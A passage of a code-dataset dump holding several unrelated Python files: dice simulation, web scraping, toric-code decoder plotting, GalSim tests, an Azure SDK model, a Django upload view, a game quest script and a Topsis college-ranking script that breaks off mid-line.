dice_list[i])\n\n\n fair_roll = sum_dice % 6\n\n if fair_roll == 0:\n fair_roll_dictionary[\"P0\"] += 1\n elif fair_roll == 1:\n fair_roll_dictionary[\"P1\"] += 1\n elif fair_roll == 2:\n fair_roll_dictionary[\"P2\"] += 1\n elif fair_roll == 3:\n fair_roll_dictionary[\"P3\"] += 1\n elif fair_roll == 4:\n fair_roll_dictionary[\"P4\"] += 1\n elif fair_roll == 5:\n fair_roll_dictionary[\"P5\"] += 1\n else:\n print(\"Control should not reach here. Fair roll = \" + str(fair_roll))\n\n return fair_roll_dictionary\n\n\n\n\n\n# Given a list of probabilities for six-sided dice rolls and an integer \"num_tosses\", produces a list\n# that contains the results of performing \"num_tosses\" tosses with given probabilities. Assumes \"probability_list\"\n# input list contains probabilities of rolls in the order [P0, P1, P2, P3, P4, P5] and returns list in same order\ndef produce_rolls(probability_list, num_tosses):\n dice_list = [0,0,0,0,0,0]\n # Create tuples with mapped ranges. Ex: P0 = P1 = P2 = P3 = P4 = .2, P5 = 0 produces tuples:\n # P0_range (0, .2), P1_range (.2, .4), P2_range (.4, .6), P3_range(.6,.8), P4_range(.8, 1.0), P5_range(1.0, 1.0)\n\n P0_range = 0, round(probability_list[0],5)\n P1_range = round(P0_range[1],5) , round(P0_range[1] + probability_list[1], 5)\n P2_range = round(P1_range[1],5) , round(P1_range[1] + probability_list[2], 5)\n P3_range = round(P2_range[1],5) , round(P2_range[1] + probability_list[3], 5)\n P4_range = round(P3_range[1],5) , round(P3_range[1] + probability_list[4], 5)\n P5_range = round(P4_range[1],5) , round(P4_range[1] + probability_list[5], 5)\n\n for i in range(0, num_tosses):\n\n rand_num = round(random(),5)\n if rand_num >= P0_range[0] and rand_num <= P0_range[1]:\n dice_list[0] += 1\n\n elif rand_num >= P1_range[0] and rand_num <= P1_range[1]:\n dice_list[1] += 1\n\n elif rand_num >= P2_range[0] and rand_num <= P2_range[1]:\n dice_list[2] += 1\n\n elif rand_num >= P3_range[0] and rand_num <= P3_range[1]:\n dice_list[3] += 1\n\n elif rand_num >= P4_range[0] and rand_num <= P4_range[1]:\n dice_list[4] += 1\n\n elif rand_num >= P5_range[0] and rand_num <= P5_range[1]:\n dice_list[5] += 1\n\n else:\n print(str(rand_num) + \" not in any range. This should not occur.\")\n\n return dice_list\n\n# Gather a list of six probabilities for six-sided dice from user\ndef query_probabilities():\n probability_list = []\n\n while ((sum(probability_list)) != 1.00):\n if len(probability_list) != 0:\n print(\"Probability values did not sum to 1.00. Sum = \" + str(sum(probability_list)))\n probability_list.clear()\n while (len(probability_list) != 6):\n x = input(\"Enter probability value for P\" + str(len(probability_list)) + \". Current sum is \" + str(round((sum(probability_list)), 5)) + \" : \")\n user_input = float(x)\n\n if user_input >= 0 and user_input <= 1.00:\n\n if ((sum(probability_list)) + user_input > 1.00):\n print(\"Sum of probabilities cannot exceed 1.00. Current sum = \" + str(round((sum(probability_list)), 5)))\n\n else:\n probability_list.append(round(user_input, 5))\n\n # Invalid user input\n else:\n print(\"Must enter a number between 0 and 1.00\")\n\n return probability_list\n","sub_path":"Fair-Dice-Generator/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"388969238","text":"from bs4 import BeautifulSoup\nimport requests\n\nclass WebScrap():\n\tdef __init__(self):\n\t\tpass\n\n\tdef getHTML(self, url):\n\t\treturn requests.get(url).text\n\n\tdef makeSoup(self, html_content):\n\t\treturn BeautifulSoup(html_content, 'lxml')\n\n\t#This function will return all the links of a webpage except the links of particular focussing an element (starting with #)\n\tdef getAllLinks(self, html_soup):\n\t\tall_links = html_soup.find_all('a')\n\t\tvalid_links=[]\n\n\t\tfor link_content in all_links:\n\t\t\tlink_a = link_content['href']\n\t\t\t#Validating the link\n\t\t\tif len(link_a)>0 and (link_a[0]) is not '#':\n\t\t\t\tif '#' in link_a:\n\t\t\t\t\tchar_idx = link_a.find('#')\n\t\t\t\t\tnew_link = link_a[:char_idx]\n\t\t\t\telse:\n\t\t\t\t\tnew_link = link_a\n\n\t\t\t\tif new_link not in valid_links:\n\t\t\t\t\tvalid_links.append(new_link)\n\t\treturn valid_links\n\n\tdef getAllLinksText(self, html_soup):\n\t\tall_links = html_soup.find_all('a')\n\t\tvalid_links_text=[]\n\n\t\tfor link_content in all_links:\n\t\t\tlink_a = link_content['href']\n\t\t\t#Validating the link\n\t\t\tif len(link_a)>0 and (link_a[0]) is not '#':\n\t\t\t\tif '#' in link_a:\n\t\t\t\t\tchar_idx = link_a.find('#')\n\t\t\t\t\tnew_link = link_a[:char_idx]\n\t\t\t\telse:\n\t\t\t\t\tnew_link = link_a\n\n\t\t\t\tif new_link not in valid_links_text:\n\t\t\t\t\tvalid_links_text.append(link_content.text)\n\t\treturn valid_links_text\n\n\t#This function will get the urls of all the images in a page\n\tdef getImgLinks(self, html_soup):\n\t\timg_links = html_soup.find_all('img')\n\t\timg_links = map(lambda x: x['src'], img_links)\n\t\treturn list(img_links)\n\n\t#This function will get the urls of all the images in a page\n\tdef getContent(self, elements):\n\t\treturn list(map(lambda x: x.text, elements))\n\n\t#This function will get the text data in a page\n\tdef getTextData(self, html_soup):\n\t\ttext_data=[]\n\t\ttext_data += self.getContent(html_soup.find_all('p'))\n\t\ttext_data += self.getContent(html_soup.find_all('a'))\n\t\ttext_data += self.getContent(html_soup.find_all('div',class_='bigtitle'))\n\t\ttext_data += self.getContent(html_soup.find_all('h1'))\n\t\ttext_data += self.getContent(html_soup.find_all('h2'))\n\t\ttext_data += self.getContent(html_soup.find_all('h3'))\n\t\ttext_data += self.getContent(html_soup.find_all('h4'))\n\t\ttext_data += self.getContent(html_soup.find_all('h5'))\n\t\treturn text_data\n\nbaseURL='http://midas.iiitd.edu.in'\nmidaslab = WebScrap()\nweb_content = midaslab.getHTML(baseURL)\t\t\nsoup = midaslab.makeSoup(web_content) \nlinks = midaslab.getAllLinks(soup)\nlinks_text = midaslab.getAllLinksText(soup)\n#Navigation pages URL\nnav_pages_links = links[:8]\nnav_pages_links_text = links_text[:8]\n#Iterating over all the navigation links to find out the urls of images and writing it to the file\npageno=1\nwith open('imglinks.txt', 'w') as f:\n\tfor linkno in range(0,len(nav_pages_links)):\n\t\tnav_url=nav_pages_links[linkno]\n\t\tnav_text=nav_pages_links_text[linkno]\n\t\tweb_content_navpage = midaslab.getHTML(baseURL+nav_url)\n\t\tsoup_navpage = midaslab.makeSoup(web_content_navpage)\n\t\timglinks = midaslab.getImgLinks(soup_navpage)\n\t\tf.write('Page No-{}, Name - {}\\n'.format(pageno,nav_text))\n\t\tf.write('Page Link- {}{}\\n'.format(baseURL,nav_url))\n\t\tf.write('Image Links--\\n')\n\t\tfor img_link in imglinks:\n\t\t\tf.write(\"{}{}\\n\".format(baseURL,img_link))\n\t\tf.write('----------------------------------\\n'.format(pageno))\n\t\tpageno += 1\n\n#Iterating over all the navigation links to find out the text data and writing it to the file\npageno=1\nwith open('textdata.txt', 'w') as f:\n\tfor linkno in range(0,len(nav_pages_links)):\n\t\tnav_url=nav_pages_links[linkno]\n\t\tnav_text=nav_pages_links_text[linkno]\n\t\tweb_content_navpage = midaslab.getHTML(baseURL+nav_url)\n\t\tsoup_navpage = midaslab.makeSoup(web_content_navpage)\n\t\ttextdata = midaslab.getTextData(soup_navpage)\n\t\tf.write('Page No-{}, Name - {}\\n'.format(pageno,nav_text))\n\t\tf.write('Page Link- {}{}\\n'.format(baseURL,nav_url))\n\t\tf.write('Text Data--\\n')\n\t\tfor textdata_row in textdata:\n\t\t\tf.write(\"{}\\n\".format(textdata_row))\n\t\tf.write('----------------------------------\\n\\n'.format(pageno))\n\t\tpageno += 1\n\n\n","sub_path":"ws_midaslabs.py","file_name":"ws_midaslabs.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40973743","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport torch\nimport _pickle as cPickle\nfrom src.RL import RL\nfrom src.toric_model import Toric_code\nfrom NN import NN_11, NN_17\nfrom ResNet import ResNet18, ResNet34, ResNet50, ResNet101, ResNet152\n\nt0 = time.time()\n\ndef get_results(system_size, NETWORK_FILE_NAME, network):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n num_of_predictions = 3000\n\n # initialize RL class\n rl = RL(Network=network,\n Network_name=NETWORK_FILE_NAME,\n system_size=system_size,\n device=device)\n\n # Generate folder structure, all results are stored in the data folder \n timestamp = time.strftime(\"%y_%m_%d__%H_%M_%S__\")\n PATH = f'data/d_{system_size}/results__' + str(NETWORK_FILE_NAME) + '__' + timestamp\n if not os.path.exists(PATH):\n os.makedirs(PATH)\n\n # Path for the network to use for the prediction\n PATH2 = 'network/' + str(NETWORK_FILE_NAME) + '.pt'\n\n win_rates = []\n\n with open(PATH + '/data_all', 'w+') as f:\n\n f.write('network, p_error, num_of_predictions, error corrected, ground state conserved, average number of steps, number of failed syndroms, win_rate')\n\n p_errors = np.arange(0.05, 0.17, 0.02)\n\n for error in p_errors:\n\n f.write('\\n')\n \n error_corrected_list, ground_state_list, average_number_of_steps_list, failed_syndroms, prediction_list_p_error = rl.prediction(\n num_of_predictions=num_of_predictions, \n num_of_steps=50, \n PATH=PATH2, \n prediction_list_p_error=[error],\n plot_one_episode=False)\n\n win_rate = (num_of_predictions - len(failed_syndroms)/2) / num_of_predictions\n win_rates.append(win_rate)\n\n for result in [NETWORK_FILE_NAME, error, num_of_predictions, error_corrected_list[0], ground_state_list[0],average_number_of_steps_list[0], len(failed_syndroms)/2, win_rate]:\n f.write(str(result) + ', ')\n\n return p_errors, win_rates\n\nnets = [(5, 'size_5_size_5_NN_11_epoch_79', NN_11), (7, 'size_7_size_7_size_7_NN_11_epoch_178_epoch_21', NN_11), (9, 'size_9_size_9_NN_11_epoch_279', NN_11), (11, 'size_11_size_11_NN_11_epoch_207', NN_11)]\n\nresults_nets = [get_results(*net) for net in nets]\n\nfig, ax = plt.subplots(figsize=(12, 8))\n\nax.scatter(results_nets[0][0], results_nets[0][1], s=100, label='d = 5', color='steelblue', marker='o')\nax.scatter(results_nets[1][0], results_nets[1][1], s=100, label='d = 7', color='green', marker='D')\nax.scatter(results_nets[2][0], results_nets[2][1], s=100, label='d = 9', color='orange', marker='X')\nax.scatter(results_nets[3][0], results_nets[3][1], s=100, label='d = 11', color='firebrick', marker='^')\n\n# ax.scatter(P_error11, P_success11,s=100, label='d = '+str(system_size11), color='firebrick', marker='^')\n# ax.scatter(P_error13, P_success13,s=100, label='d = '+str(system_size13), color='saddlebrown', marker='s')\nax.legend(fontsize=14)\nax.plot(results_nets[0][0], results_nets[0][1], color='steelblue')\nax.plot(results_nets[1][0], results_nets[1][1], color='green')\nax.plot(results_nets[2][0], results_nets[2][1], color='orange')\nax.plot(results_nets[3][0], results_nets[3][1], color='firebrick')\n# ax.plot(P_error11,P_success11, color='firebrick')\n# ax.plot(P_error13,P_success13, color='saddlebrown')\n#ax.set_xlim(0.005, 0.205)\nplt.xlabel('$P_e$', fontsize=20)\nplt.ylabel('$P_s$', fontsize=20)\nplt.title('Prestanda för tränade agenter', fontsize=20)\nplt.tick_params(axis='both', labelsize=14)\nplt.savefig('plots/results_' + time.strftime(\"%y_%m_%d__%H_%M_%S__\") + '.png')\nplt.show()\n\nprint('tid:', time.time() - t0, 's')","sub_path":"plot_predictions.py","file_name":"plot_predictions.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"603426451","text":"# imports, etc.\nimport galsim\nimport galsim.wfirst as wf\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom radec_to_chip import *\n\n# Make a list of RA/dec central values and nearby values\nn_vals = 100\nseed = 314159\nud = galsim.UniformDeviate(seed=seed)\nmin_ra = 0.0\nmax_ra = 360.0\nmin_cos_dec = -0.95\nmax_cos_dec = 0.3\nra_cen_vals = np.zeros(n_vals)\ndec_cen_vals = np.zeros(n_vals)\nra_vals = np.zeros(n_vals)\ndec_vals = np.zeros(n_vals)\ndelta_dist = 0.5 # degrees offset allowed for (ra, dec) compared to center of focal plane\nchris_sca = np.zeros(n_vals).astype(int)\npa_arr = np.zeros(n_vals)\ndate = datetime.datetime(2025, 1, 12)\nfor i in range(n_vals):\n # Keep choosing random FPA center positions until we get one that can be observed on the chosen\n # date.\n pa = None\n while (pa is None):\n ra_cen_vals[i] = min_ra + (max_ra-min_ra)*ud()\n dec_cen_vals[i] = \\\n 90.0-(180.0/np.pi)*np.arccos(min_cos_dec + (max_cos_dec-min_cos_dec)*ud())\n fpa_center = galsim.CelestialCoord(\n ra=ra_cen_vals[i]*galsim.degrees,\n dec=dec_cen_vals[i]*galsim.degrees)\n pa = wf.bestPA(fpa_center, date)\n pa_arr[i] = pa / galsim.radians\n ra_vals[i] = ra_cen_vals[i] + delta_dist*(ud()-0.5)*np.cos(dec_cen_vals[i]*np.pi/180.)\n dec_vals[i] = dec_cen_vals[i] + delta_dist*(ud()-0.5)\n # Find the SCAs from Chris's code (Python version) for the same points (0=not on an SCA)\n chris_sca[i] = radec_to_chip(np.array([ra_cen_vals[i]*np.pi/180.0]),\n np.array([dec_cen_vals[i]*np.pi/180.0]),\n np.array([pa]),\n np.array([ra_vals[i]*np.pi/180.]),\n np.array([dec_vals[i]*np.pi/180.]))\n\nout_data = np.column_stack((ra_cen_vals, dec_cen_vals, ra_vals, dec_vals, pa_arr, chris_sca))\nnp.savetxt('chris_comparison.txt', out_data, fmt='%.8f %.8f %.8f %.8f %.8f %d')\n\n","sub_path":"tests/wfirst_files/gen_chris_comparison.py","file_name":"gen_chris_comparison.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478090191","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom .sub_resource_py3 import SubResource\n\n\nclass LoadBalancingSettingsModel(SubResource):\n \"\"\"Load balancing settings for a backend pool.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :param id: Resource ID.\n :type id: str\n :param sample_size: The number of samples to consider for load balancing\n decisions\n :type sample_size: int\n :param successful_samples_required: The number of samples within the\n sample period that must succeed\n :type successful_samples_required: int\n :param additional_latency_milliseconds: The additional latency in\n milliseconds for probes to fall into the lowest latency bucket\n :type additional_latency_milliseconds: int\n :param resource_state: Resource status. Possible values include:\n 'Creating', 'Enabling', 'Enabled', 'Disabling', 'Disabled', 'Deleting'\n :type resource_state: str or\n ~azure.mgmt.frontdoor.models.FrontDoorResourceState\n :param name: Resource name.\n :type name: str\n :ivar type: Resource type.\n :vartype type: str\n \"\"\"\n\n _validation = {\n 'type': {'readonly': True},\n }\n\n _attribute_map = {\n 'id': {'key': 'id', 'type': 'str'},\n 'sample_size': {'key': 'properties.sampleSize', 'type': 'int'},\n 'successful_samples_required': {'key': 'properties.successfulSamplesRequired', 'type': 'int'},\n 'additional_latency_milliseconds': {'key': 'properties.additionalLatencyMilliseconds', 'type': 'int'},\n 'resource_state': {'key': 'properties.resourceState', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n }\n\n def __init__(self, *, id: str=None, sample_size: int=None, successful_samples_required: int=None, additional_latency_milliseconds: int=None, resource_state=None, name: str=None, **kwargs) -> None:\n super(LoadBalancingSettingsModel, self).__init__(id=id, **kwargs)\n self.sample_size = sample_size\n self.successful_samples_required = successful_samples_required\n self.additional_latency_milliseconds = additional_latency_milliseconds\n self.resource_state = resource_state\n self.name = name\n self.type = None\n","sub_path":"src/front-door/azext_front_door/vendored_sdks/models/load_balancing_settings_model_py3.py","file_name":"load_balancing_settings_model_py3.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"213010604","text":"from django.shortcuts import get_object_or_404, render_to_response\nfrom django.conf import settings\nfrom django.http import HttpResponse, HttpResponseBadRequest\nfrom models import MultiuploaderImage\nfrom django.core.files.uploadedfile import UploadedFile\nfrom staging.models import CompSlide, Comp\nfrom django.forms.models import inlineformset_factory\nfrom django.template import loader, Context\nfrom django.contrib.admin import widgets, helpers\nfrom stager.staging.admin import CompSlideInline, CompAdmin\nfrom stager.staging.forms import *\nfrom django.db import transaction\nfrom django.contrib import admin\nfrom stager.staging.decorators import superuser_only\n\n#importing json parser to generate jQuery plugin friendly json response\nfrom django.utils import simplejson\n\n#for generating thumbnails\n#sorl-thumbnails must be installed and properly configured\nfrom sorl.thumbnail import get_thumbnail\n\n\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport logging\nlog = logging\n\n@csrf_exempt\ndef multiuploader_delete(request, pk):\n \"\"\"\n View for deleting photos with multiuploader AJAX plugin.\n made from api on:\n https://github.com/blueimp/jQuery-File-Upload\n \"\"\"\n if request.method == 'POST':\n log.info('Called delete image. image id='+str(pk))\n image = get_object_or_404(MultiuploaderImage, pk=pk)\n image.delete()\n log.info('DONE. Deleted photo id='+str(pk))\n return HttpResponse(str(pk))\n else:\n log.info('Received not POST request to delete image view')\n return HttpResponseBadRequest('Only POST accepted')\n\n@csrf_exempt\n@superuser_only\ndef multiuploader(request):\n \"\"\"\n Main Multiuploader module.\n Parses data from jQuery plugin and makes database changes.\n \"\"\"\n if request.method == 'POST':\n with transaction.commit_on_success():\n comp_id = request.POST.get('compId', None)\n try:\n comp = Comp.objects.get(id=comp_id)\n except:\n return HttpResponseBadRequest('Comp Does Not Exist')\n log.info('received POST to main multiuploader view')\n if request.FILES == None:\n return HttpResponseBadRequest('Must have files attached!')\n \n #getting file data for farther manipulations\n file = request.FILES[u'files[]']\n \n wrapped_file = UploadedFile(file)\n filename = wrapped_file.name\n file_size = wrapped_file.file.size\n prepared_filename = os.path.splitext(filename)[0].replace('_', ' ').title()\n slide = CompSlide()\n slide.title = prepared_filename\n slide.image = file\n slide.comp = comp\n slide.name = prepared_filename\n slide.save()\n comp.save()\n\n log.info ('Got file: \"%s\"' % str(filename))\n log.info('Content type: \"$s\" % file.content_type')\n \n log.info('File saving done')\n #settings imports\n with transaction.commit_on_success():\n #get the current site\n admin_site = admin.site\n compAdmin = CompAdmin(Comp, admin_site)\n \n #get all possible inlines for the parent Admin\n inline_instances = compAdmin.get_inline_instances(request)\n prefixes = {}\n \n for FormSet, inline in zip(compAdmin.get_formsets(request, comp), inline_instances):\n #get the inline of interest and generate it's formset\n if isinstance(inline, CompSlideInline):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1 or not prefix:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(instance=comp, prefix=prefix, queryset=inline.queryset(request))\n \n #get possible fieldsets, readonly, and prepopulated information for the parent Admin\n fieldsets = list(inline.get_fieldsets(request, comp))\n readonly = list(inline.get_readonly_fields(request, comp))\n prepopulated = dict(inline.get_prepopulated_fields(request, comp))\n \n #generate the inline formset\n inline_admin_formset = helpers.InlineAdminFormSet(inline, formset,\n fieldsets, prepopulated, readonly, model_admin=compAdmin)\n\n #render the template\n t = loader.get_template('admin/staging/edit_inline/_comp_slide_drag_upload_ajax.html')\n c = Context({ 'inline_admin_formset': inline_admin_formset })\n rendered = t.render(c)\n result = []\n result.append({\"name\":filename, \n \"size\":file_size, \n \"delete_type\":\"POST\",\n \"html\": rendered })\n response_data = simplejson.dumps(result)\n \n #checking for json data type\n #big thanks to Guy Shapiro\n if \"application/json\" in request.META['HTTP_ACCEPT_ENCODING']:\n mimetype = 'application/json'\n else:\n mimetype = 'text/plain'\n return HttpResponse(response_data, mimetype=mimetype)\n else: #GET\n return HttpResponse('Only POST accepted')\n\ndef multi_show_uploaded(request, key):\n \"\"\"Simple file view helper.\n Used to show uploaded file directly\"\"\"\n image = get_object_or_404(MultiuploaderImage, key_data=key)\n url = settings.MEDIA_URL+image.image.name\n return render_to_response('multiuploader/one_image.html', {\"multi_single_url\":url,})","sub_path":"stager/multiuploader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"292610672","text":"# By L2J_JP SANDMAN\nfrom l2server.gameserver.model.quest import State\nfrom l2server.gameserver.model.quest.jython import QuestJython as JQuest\n\nqn = \"119_LastImperialPrince\"\n\n# NPC\nSPIRIT = 31453 # Nameless Spirit\nDEVORIN = 32009 # Devorin\n\n# ITEM\nBROOCH = 7262 # Antique Brooch\n\n# REWARD\nADENA = 57 # Adena\nAMOUNT = 150292 # Amount\n\n\nclass Quest(JQuest):\n def __init__(self, id, name, descr):\n JQuest.__init__(self, id, name, descr)\n\n def onEvent(self, event, st):\n htmltext = event\n if event == \"31453-4.htm\":\n st.set(\"cond\", \"1\")\n st.setState(State.STARTED)\n st.playSound(\"ItemSound.quest_accept\")\n elif event == \"32009-2.htm\":\n if st.getQuestItemsCount(BROOCH) < 1:\n htmltext = \"Quest Four Goblets is not accomplished or the condition is not suitable.\"\n st.exitQuest(1)\n elif event == \"32009-3.htm\":\n st.set(\"cond\", \"2\")\n st.playSound(\"ItemSound.quest_middle\")\n elif event == \"31453-7.htm\":\n st.giveItems(ADENA, AMOUNT)\n st.addExpAndSp(902439, 90067)\n st.setState(State.COMPLETED)\n st.playSound(\"ItemSound.quest_finish\")\n st.exitQuest(1)\n return htmltext\n\n def onTalk(Self, npc, player):\n st = player.getQuestState(qn)\n htmltext = Quest.getNoQuestMsg(player)\n if not st: return htmltext\n cond = st.getInt(\"cond\")\n npcId = npc.getNpcId()\n id = st.getState()\n if st.getQuestItemsCount(BROOCH) < 1:\n htmltext = \"Quest Four Goblets is not accomplished or the condition is not suitable.\"\n st.exitQuest(1)\n elif id == State.CREATED:\n if player.getLevel() < 74:\n htmltext = \"Quest for characters level 74 and above.\"\n st.exitQuest(1)\n else:\n htmltext = \"31453-1.htm\"\n elif id == State.COMPLETED:\n htmltext = Quest.getAlreadyCompletedMsg(player)\n st.exitQuest(1)\n elif npcId == SPIRIT:\n if cond == 1:\n htmltext = \"31453-4.htm\"\n elif cond == 2:\n htmltext = \"31453-5.htm\"\n elif npcId == DEVORIN:\n if cond == 1:\n htmltext = \"32009-1.htm\"\n elif cond == 2:\n htmltext = \"32009-3.htm\"\n return htmltext\n\n\nQUEST = Quest(119, qn, \"Last Imperial Prince\")\n\nQUEST.addStartNpc(SPIRIT)\n\nQUEST.addTalkId(SPIRIT)\nQUEST.addTalkId(DEVORIN)\n","sub_path":"data/scripts/quests/119_LastImperialPrince/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592160074","text":"# @Time : 2019/5/18 17:30\n# @Author: Root\n# @File : Topsis.py\n\n\nimport openpyxl\nimport os\nimport numpy as np\nimport paranoid_root.contests.mathematical_modeling.group_a.Utility as uti\nimport random\nimport math\n\n\nclass College(object):\n \"\"\"\n # 在这个类中完成对大学的构建\n \"\"\"\n id = \"\"\n name = \"\"\n totalClicks = 0\n monthClicks = 0\n weekClicks = 0\n location = \"\"\n isDirected = -1\n is985 = -1\n is211 = -1\n schoolType = \"\"\n majors = {}\n furtherStudyRate = 0.0\n workRate = 0.0\n schoolScore = 0.0\n\n def __init__(self, _id, _name, _totalClks, _monthClks, _weekClks, _location, _isDirected, _is985,\n _is211, _schoolType, _majors,\n futherRate=0.0, workRate=0.0, _schoolScore=0.0):\n self.id = _id\n self.name = _name\n self.totalClicks = _totalClks\n self.monthClicks = _monthClks\n self.weekClicks = _weekClks\n self.location = _location\n self.isDirected = _isDirected\n self.is985 = _is985\n self.is211 = _is211\n self.schoolType = _schoolType\n self.majors = _majors\n self.furtherStudyRate = futherRate\n self.workRate = workRate\n self.schoolScore = _schoolScore\n\n @classmethod\n def buildByXlsRow(cls, row, workSheet):\n \"\"\"\n 通过row来构建一个College对象\n :param row:\n :param workSheet:\n :return:\n \"\"\"\n id = workSheet.cell(row, 1).value\n name = workSheet.cell(row, 2).value\n totalClks = int(workSheet.cell(row, 3).value)\n monthClks = int(workSheet.cell(row, 4).value)\n weekClks = int(workSheet.cell(row, 5).value)\n location = workSheet.cell(row, 6).value\n isDrcted = int(workSheet.cell(row, 7).value)\n is985 = int(workSheet.cell(row, 8).value)\n is211 = int(workSheet.cell(row, 9).value)\n schoolType = workSheet.cell(row, 10).value\n\n majorStr = workSheet.cell(row, 11).value\n majors = majorStr.split(\"、\")\n majors = set([major for major in majors if major != None and major != \"\"])\n\n furtherStudyRate = 0.0\n workRate = 0.0\n schoolScore = 0.0\n\n if workSheet.cell(row, 12).value:\n furtherStudyRate = float(workSheet.cell(row, 12).value)\n workRate = float(workSheet.cell(row, 13).value)\n schoolScore = float(workSheet.cell(row, 14).value)\n\n t = College(id, name, totalClks, monthClks, weekClks, location,\n isDrcted, is985, is211,\n schoolType, majors, furtherStudyRate, workRate,\n schoolScore)\n return t\n\n def __str__(self):\n return (self.id, self.name, self.location,\n self.totalClicks, self.monthClicks, self.weekClicks,\n \"直属\" if self.isDirected else \"非直属\",\n \"985\" if self.is985 else \"非985\",\n \"211\" if self.is211 else \"非211\",\n self.schoolType,\n str(self.majors)\n ).__str__()\n\n def getMostSimilarMajorValue(self, majorStr):\n calculator = uti.Majors(self.majors)\n ans = calculator.getTopNSimilarity(majorStr)[0][0]\n return ans\n\n\nclass Colleges(object):\n \"\"\"\n # 这个类完成构建所有的大学\n \"\"\"\n xlsPath = \"\" # 注意是absPath\n workBook = None\n workSheet = None\n collegeDict = None\n\n def __init__(self, xlsPath=os.path.join(os.getcwd(), r\"data\\allCollegeInfos.xlsx\")):\n self.xlsPath = xlsPath\n self.workBook = openpyxl.load_workbook(self.xlsPath)\n self.workSheet = self.workBook.worksheets[0]\n self.collegeDict = dict()\n maxRow = self.workSheet.max_row\n for row in range(1, maxRow + 1):\n college = College.buildByXlsRow(row, self.workSheet)\n self.collegeDict[college.name] = self.collegeDict[college.id] = college\n\n def getCollegeByName(self, collegeName):\n return self.collegeDict[collegeName]\n\n def getCollegeById(self, collegeId):\n return self.collegeDict[collegeId]\n\n\nclass Student(object):\n rank = -1\n wantedMajors = {}\n\n def __init__(self, rank, wantedMajors):\n self.rank = rank\n self.wantedMajors = wantedMajors\n\n def __str__(self):\n return (self.rank, str(self.wantedMajors)).__str__()\n\n\nclass Topsis(object):\n collegeNumber = 0\n student = None\n allColleges = None\n possibleColleges = None\n rMatrix = None\n weightVector = None\n promptStr = \" 专业匹配度 就业深造 整体实力 地理位置 社会认可度 专业热度 \"\n\n def __init__(self, byMan, collegeNumber, student: Student, schools):\n self.collegeNumber = collegeNumber\n self.student = student\n self.allColleges = Colleges()\n self.possibleColleges = []\n self.pickColleges(self.pickByFixedColleges, schools)\n self.buildRMatrix()\n if not byMan :\n self.weightVector = self.buildWeightVector()\n else :\n print(\"请输入一个6 * 6的矩阵 : \")\n self.weightVector = np.zeros((6, 6) )\n lines = [ input() for i in range(6)]\n for row, line in enumerate(lines) :\n parts = line.strip().split()\n for col, part in enumerate(parts) :\n value = float(eval(part))\n self.weightVector[row][col] = value\n self.weightVector = self.getWeightVector(self.weightVector, 6)\n\n\n\n def buildRMatrix(self):\n \"\"\"\n 通过学生的信息构建出一个R矩阵\n :return:\n \"\"\"\n self.rMatrix = np.zeros((self.collegeNumber, 6) )\n print(self.rMatrix)\n self.initializeColZero()\n self.initializeColOne()\n self.initializeColTwo()\n self.initializeColThree()\n self.initializeColFour()\n self.initializeColFive()\n\n print(\"after col normalized : \")\n self.rMatrix = self.normalizeMatrixByCols(self.rMatrix)\n print(self.rMatrix)\n print(\"total normalized : \")\n print(self.promptStr)\n self.rMatrix = self.normalizeMatrix(self.rMatrix)\n print(self.rMatrix)\n for i, college in enumerate(self.possibleColleges) :\n print(i, college.name)\n\n def buildWeightVector(self):\n \"\"\"\n 生成v矩阵并返回\n :return:\n \"\"\"\n input(\"\\r\\n请学生对各个因素之比进行模糊打分 : \")\n print(\"学生打分为 :\")\n print(self.promptStr)\n t = self.buildWeightMatrix(6)\n print(t)\n t = self.getWeightVector(t, 6)\n print(\"生成的权重向量为 : \")\n print(t)\n return t\n\n def pickColleges(self, picker, *args):\n \"\"\"\n 传入一个pciker函数\n :param picker:\n :return:\n \"\"\"\n names = picker(*args)\n for name in names:\n self.possibleColleges.append(self.allColleges.collegeDict[name])\n\n def pickByFixedColleges(self, colleges):\n ans = set(colleges)\n if len(ans) != self.collegeNumber:\n raise Exception(\"学校列表出现大小错误\")\n return ans\n\n def initializeColZero(self):\n \"\"\"\n 初始化第一列\n :return:\n \"\"\"\n if not self.student.wantedMajors :\n uti.Majors.initializeClass()\n for row, college in enumerate(self.possibleColleges) :\n self.rMatrix[row][0] = 1.0\n else :\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][0] = max([college.getMostSimilarMajorValue(loved) for loved in self.student.wantedMajors])\n\n def initializeColOne(self):\n \"\"\"\n 保研率与深造率\n :return:\n \"\"\"\n choice = input(\"study(1) or job(0) : \")\n if choice == \"1\":\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][1] = 